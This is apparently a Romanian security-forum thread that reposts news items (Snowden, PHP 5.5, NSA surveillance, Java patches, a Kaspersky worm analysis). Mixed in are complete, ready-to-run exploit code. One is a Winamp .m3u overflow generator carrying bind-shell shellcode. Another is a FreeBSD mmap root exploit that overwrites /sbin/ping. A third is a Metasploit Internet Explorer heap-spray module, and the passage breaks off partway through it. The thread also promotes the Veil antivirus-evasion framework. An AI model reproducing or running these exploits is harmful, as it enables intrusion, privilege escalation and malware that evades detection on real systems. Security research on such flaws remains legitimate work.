HKSAR Government issues statement on Edward Snowden *************************************************** The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden: Mr Edward Snowden left Hong Kong today (June 23) on his own accord for a third country through a lawful and normal channel. The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong. The HKSAR Government has already informed the US Government of Mr Snowden's departure. Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong. Ends/Sunday, June 23, 2013 Issued at HKT 16:05 NNNN Sursa: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm

Topic stupid => cobra89 - ban (3 zile) Posturi inutile si care nu au legatura cu subiectul - warn.

[h=1]PHP 5.5.0 Release Announcement[/h] The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes. The key features of PHP 5.5.0 include: Added generators and coroutines. Added the finally keyword. Added a simplified password hashing API. Added support for constant array/string dereferencing. Added scalar class name resolution via ::class. Added support for using empty() on the result of function calls and other expressions. Added support for non-scalar Iterator keys in foreach. Added support for list() constructs in foreach statements. Added the Zend OPcache extension for opcode caching. The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality. A lot more improvements and fixes. Changes that affect compatibility: PHP logo GUIDs have been removed. Windows XP and 2003 support dropped. Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules. For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0. For a full list of changes in PHP 5.5.0, see the ChangeLog. Sursa: PHP: PHP 5.5.0 Release Announcement

[h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h] # Exploit Title: Winamp 5.12 .m3u stack based buffer overflow # Date: 16 June 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.winamp.com/ # Software Link: http://www.oldapps.com/winamp.php?old_winamp=211 # Version: 5.12 # Tested on: Windows XP Professional SP2, English # CVE: CVE-2006-0720 # BID: 16785 # # Description from CVE-2006-0720 # Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 # allows user-assisted attackers to cause a denial of service # (crash) and possibly execute arbitrary code via a crafted # .m3u file that causes an incorrect strncpy function call # when the player pauses or stops the file. # # # 1. Launch Winamp # 2. Drag boom.m3u into Winamp window # 3. Check for bind shell on port 28876 # import struct header = "#EXTM3U\n" header += "#EXTINF:1234,Pwnage Rock\n" # NTDisplayString egghunter = ( "\x90" * 64 + "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" + "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" + "\x77\x30\x30\x74" + # w00t "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90" * 30 ) junk = "\x41" * 262 + "\x90" * 100 + egghunter # bind shell on port 28876 # https://code.google.com/p/w32-bind-ngs-shellcode/ # msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c" # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "w00tw00t" + "\x90" * 239 + "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" + "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" + "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" + "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" + "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" + "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" + "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" + "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" + "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" + "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" + "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" + "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" + "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" + "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" + "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" + "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" + "\x44\x83\x55" ) # 022B368C , call ecx , C:\Progam Files\Winamp\pxsdkpls.dll ret = struct.pack("<I", 0x022B368C) # for some reason eip doesn't get overwritten and Winamp # crashes differently unless the 4th byte after ret is # a 0xB0. there's probably an easier way to do this but # this is what the fuzzer found first so... wtf = "\x43\x43\x43\xB0" f = open("boom.m3u", "w") f.write(header + junk + shellcode + ret + wtf) f.close() print "Created boom.m3u" print "1. Open Winamp" print "2. Drag boom.m3u into Winamp window" print "3. Check for bind shell on port 28876" Sursa: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow

[h=1]Memcached Remote Denial of Service PoC[/h] A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page. The report is here: https://code.google.com/p/memcached/issues/detail?id=192 Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed. As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck! memcached ded Exploit code available to download here: killthebox.py As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it. As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it. Sursa: Memcached Remote Denial of Service PoC | Insecurety Research

[h=2]FreeBSD mmap Privilege Escalation Exploit[/h] /** * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox) * * tested on FreeBSD 9.1 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc * * @_hugsy_ * * Syntax : $ id uid=1001(user) gid=1001(user) groups=1001(user) $ gcc -Wall ./mmap.c && ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 3404 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel) * * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand * */ #include <sys/mman.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/stat.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #define LEN 1000*getpagesize() #define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand void kaboom(int pid, caddr_t addr) { int nb, i, a, fd, n; char buf[60000] = {0,}; a = i = 0; fd = open(TARGET, O_RDONLY); nb = read(fd, buf, 60000); close(fd); printf("[+] Saved old '%s'\n", TARGET); printf("[+] Using mmap-ed area at %p\n", addr); if (ptrace(PT_ATTACH, pid, 0, 0) < 0) { perror("[-] ptrace(PT_ATTACH) failed"); return; } printf("[+] Attached to %d\n", pid); wait(NULL); fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH); write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n",84); close(fd); if (system("gcc -o ./sc ./sc.c") != 0) { perror("[-] gcc"); return; } fd = open("./sc", O_RDONLY); while (1) { int a; int n = read(fd, &a, sizeof(int)); if (n <= 0) break; if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } i+=n; } close(fd); printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET); printf("[+] Triggering payload\n"); system(TARGET); printf("[+] Restoring '%s'\n", TARGET); for (n=0, i=0; n<nb; n++) { if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } } ptrace(PT_DETACH, pid, 0, 0); printf("[+] Done\n"); return; } void dummy(int fd, caddr_t addr) { sleep(1); munmap(addr, LEN); close(fd); return; } int main(int argc, char** argv, char** envp) { int fd = open(TARGET, O_RDONLY); caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0); pid_t forked_pid = fork(); switch(forked_pid) { case -1: return -1; case 0: dummy(fd, addr); break; default: munmap(addr, LEN); close(fd); kaboom(forked_pid, addr); wait(NULL); break; } return 0; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Ei au inventat hackingul.

Vedem in weekend

Nu vazusem acel "Self".

Cum il exploatezi?

New Bounty Program Details - Security Research & Defense - Site Home - TechNet Blogs

Nu am scris eu. Ar fi foarte multe lucruri de spus. Aveti putina rabdare...

[h=3]Evidence that the NSA Is Storing Voice Content, Not Just Metadata[/h] Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading. I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls is just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability. Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications. William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more. "They look through these phone numbers and they target those and that's what they record," Binney said. Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved. I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with. And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing? Sursa: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata

[h=1]Veil – AV Evasion[/h] [h=1]Veil v2.0 : Towards a True Framework[/h] June 17, 2013 by The Grayhound Repo Location: https://github.com/ChrisTruncer/Veil Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads: New Structure Veil has moved from a single flat file towards a truly modular framework: Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically Common reusable functions are stored in various files in ./modules/common/* Source/compiled files are output by default to ./output/source/ and ./output/compiled/ ./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually External tools used by payloads are stored in ./tools/ ./doc/* contains pydoc generated documentation for the framework [*]A tutorial describing how to develop payload modules is forthcoming. New features Veil’s menus and interface have been redesigned for increased usability. One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format. Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out! A new python ‘crypter’ named ‘pyherion’ (inspired by Null Security’s Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py . A short post explaining its implementation details will be forthcoming. Command line switches have been implemented for almost all options. Type ./Veil.py -h for details. New payloads C payloads – Using both a void pointer reference and direct injection into memory with VirrtualAlloc calls Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload. C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation. Native payloads – hyperion and pescrambler Sursa: https://www.veil-evasion.com/

[h=1]Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc?[/h]Studen?ii sau absolven?ii de programe universitare de licen?? cu vârsta de pân? la 25 ani ?i cuno?tin?e de baz? în domeniul IT pot aplica pân? la 1 iulie pentru un program de practic? de specialitate (internship) la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Ac?iunea este ini?iat? în baza programului de guvernare, care prevede crearea unui sistem real de internship în administra?ia public? central? ?i local? pentru studen?ii cu rezultate deosebite, informeaz? Executivul. Un program de internship presupune un stagiu de practic? la locul de munc? pentru cariere profesioniste, destinat studen?ilor sau absolven?ilor de studii universitare, prin care ace?tia se pot familiariza cu specificul unei structuri ?i cunosc fluxul de activit??i sprijinind direct angaja?ii la îndeplinirea activit??ilor zilnice. Pentru a fi inclu?i în program, tinerii trebuie s? îndeplineasc?, cumulativ, o serie de criterii de eligibilitate, respectiv s? de?in? cet??enia român?, s? aib? vârsta de pân? la 25 de ani, s? fie studen?i ori tineri absolven?i ai programelor universitare de licen??, s? cunoasc? bine cel pu?in o limb? str?in? de circula?ie interna?ional? ?i s? aib? cuno?tin?e de baz? în domeniul IT (respectiv cuno?tin?e avansate pentru aplica?ii la Direc?ia Servicii Online ?i Design). Candida?ilor ce vor fi ale?i pentru lista scurt? li se vor solicita materiale justificative suplimentare în sprijinul aplica?iei lor. Formularul de aplica?ie poate fi accesat din pagina de internet internship.gov.ro, iar termenul limit? pentru depunerea aplica?iilor, prin e-mail c?tre adresa oficial? a programului internship@gov.ro, este 1 iulie 2013 inclusiv. Aplica?iile primite ulterior nu vor fi luate în considerare. Tinerii selecta?i vor fi repartiza?i, în raport cu competen?ele acestora, la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Sursa: Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc? - Mediafax

How NSA access was built into Windows Duncan Campbell 04.09.1999 Careless mistake reveals subversion of Windows by NSA. A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled. The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA. Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer. [TABLE=class: img, width: 100%] [TR] [TD] [/TD] [/TR] [/TABLE] ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US governments allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do. Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVADPI driver. He found it contained two different keys. One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery. A second key Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandez, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY". Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge. A third key?! But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMachia, head of CAPI development at Microsoft was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code. Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers. Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors". According to Fernandez of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards. "For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for "strong" crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers". "How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked. Can the loophole be turned round against the snoopers? Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said. Fernandez believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website. According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handles encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPU's with encrypted instruction sets already been deployed, we would have never found out about NSAKEY." Sursa: How NSA access was built into Windows | Telepolis

http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb

[h=1]AutoRun. Reloaded[/h]Konstantin Markov Kaspersky Lab Expert Posted June 13, 11:17 GMT Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well. Kaspersky Lab’s products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively. These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload. For months, the number of AutoRun worms detected on Kaspersky Lab users’ computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications. Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms April 2012 – May 2013 Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms August 2011 – May 2013 Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with “regular” worms. Below is a narrative of what we have encountered. [h=2]Worm.Java.AutoRun[/h] There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample. The worm deploys itself on an infected computer in the form of four files: Java archive: the core component; its name changes in each infection attempt. It is located in the users’ temporary folder %TEMP%\jar_cache*.tmp. Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened. DLL file: an auxiliary (Win 32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user’s temporary folder: %TEMP%\hsperfdata_%USERNAME%\ Java.exe is a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is coped from %ProgramFiles% to the user’s temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component. Fragment of the class-file of a malicious JAVA archive Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executive file Java.exe from %ProgramFiles% to the same catalogue, giving it a “trusted” name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal. As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect. According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below. Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013 According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities. Number of users protected against Worm.Java.AutoRun, April-May 2013 [h=2]Worm.JS.AutoRun[/h] The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work. The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections. Code fragment for Worm.JS.AutoRun Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia. Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013 Number of users protected from Worm.JS.AutoRun in the beginning of 2013 till the end of May, 2013 In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram. According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off. In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715 Sursa: AutoRun. Reloaded - Securelist

[h=1]Critical Java SE update due Tuesday fixes 40 flaws[/h] [h=2]And yes, most are remotely exploitable[/h] By Neil McAllister in San Francisco, 14th June 2013 Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy. According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX. Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad. Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests. Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April. Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale. Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits. Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15. ® Sursa: Critical Java SE update due Tuesday fixes 40 flaws • The Register

[h=1]Web Developer Security 1.0[/h] Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla’s Mountain View office and also broadcast online. We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site. For those of you who are able to come watch the talk in person, there will be Punch & Pie! https://air.mozilla.org/web-security-training/ Sursa: Web Developer Security 1.0 | Mozilla Security Blog

[h=1]MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", 'Description' => %q{ This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery, PoC and analysis '4B5F5F4B', # PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2551' ], [ 'OSVDB', '91197' ], [ 'BID', '58570' ], [ 'MSB', 'MS13-037' ], [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] ], 'Payload' => { 'Space' => 948, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default { 'Rop' => :jre, 'Offset' => '0x5f4' } ], # requires: # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) # * ntdll.dll v6.1.7601.17725 (MS12-001) [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', { 'Rop' => :ntdll, 'Offset' => '0x5f4' } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 06 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def exploit @second_stage_url = rand_text_alpha(10) @leak_param = rand_text_alpha(5) super end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { 